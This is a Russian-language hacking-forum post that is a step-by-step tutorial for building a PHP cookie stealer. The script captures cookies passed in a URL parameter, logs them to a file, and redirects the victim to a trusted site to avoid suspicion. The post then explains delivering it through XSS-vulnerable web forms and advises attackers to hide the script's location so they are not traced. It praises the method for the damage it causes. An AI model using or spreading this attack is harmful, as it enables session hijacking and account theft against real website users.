Загрузка...

Как создать Cookie ******* ? ответ есть !))!)!

Тема в разделе Вирусология создана пользователем Happy 28 ноя 2017. 3372 просмотра

  1. Happy
    Happy Автор темы 28 ноя 2017 Держу курс на заебись 539 23 апр 2017
    Код
    [SIZE=4][B]#Обработка cookies через PHP[/B][/SIZE]
    Для начала, создадим новый [B]php[/B]-файл (для тех, кто не знаком с [B]php[/B], рекомендую посмотреть[URL='https://t.me/omnitools/22'] вот это вот[/URL]) в той же директории, где лежит наш [B]index.html[/B]:

    nano cookiestealer.php



    После добавления стандартных php-скобок, определим в файле место для редиректа (перенаправления пользователя):

    Код
    <?php
    header ('Location:https://google.com');
    ?>



    [IMG]
    *Примечание: сайт может быть любым, но лучше использовать доверенный – это вызовет меньше подозрений.



    Теперь, имея редирект, можем добавить коду для обработки cookies. Сначала определим их в переменной

    Код
    $cookies = $_GET"c";



    Далее укажем файл (например, “log.txt”) для сохранения cookies на нашем сервере:

    Код
    $file = fopen('log.txt', 'a');



    Наконец, запишем наши cookies в файл с отступом в две строки (удобочитаемость – это круто):

    Код
    fwrite($file, $cookies . "\n\n");



    Должно стать похожим на это:

    [IMG]
    Сохраним.



    #Тестируем наш cookie-******
    Не выходя из нашей уже обшарканной директории, исполним команду:

    Код
    php -S 127.0.0.1:80



    [IMG]
    Так мы запустим тестовый сервер по указанному нами адресу. Теперь введите в строке браузера указанный Вами IP...

    [IMG]
    ...скорее всего, Вас сразу же перебросит на редирект.

    [IMG]
    Если же посмотрим на **** нашего PHP-сервера, увидим, что данные были переданы в наш файл.

    [IMG]
    Проверим, открыв файл log.txt:

    Код
    cat log.txt



    [IMG]
    Какая удача, файл действительно содержит только что переданные cookies – наш ****** работает!



    #Проведение атаки
    Этот метод ценен своей простотой и объемом наносимого ущерба, а возможности реализации простираются до любого сайта, где можно использовать HTML-тег <script> (=XSS уязвимость). Популярный способ проверки веб-формы на XSS уязвимость – использование обычной функции “alert” как в примере ниже.

    Код
    <script>alert("Alert");</script>



    [IMG]
    Так же, в Kali Linux имеются уже встроенные инструменты для проверки XSS-дыр, но о них я расскажу Вам уже в отдельной статье – подписывайтесь сейчас, если не решались на это ранее

    P.S.
    В настоящих атаках нужно с осторожностью относиться к местонахождению php-скрипта. Пренебрежение этой рекомендации может повлечь ситуации, в которых путь от файла до Вас смогут отследить, а Вам сломать лицо.
     
  2. fantik22
Загрузка...
Top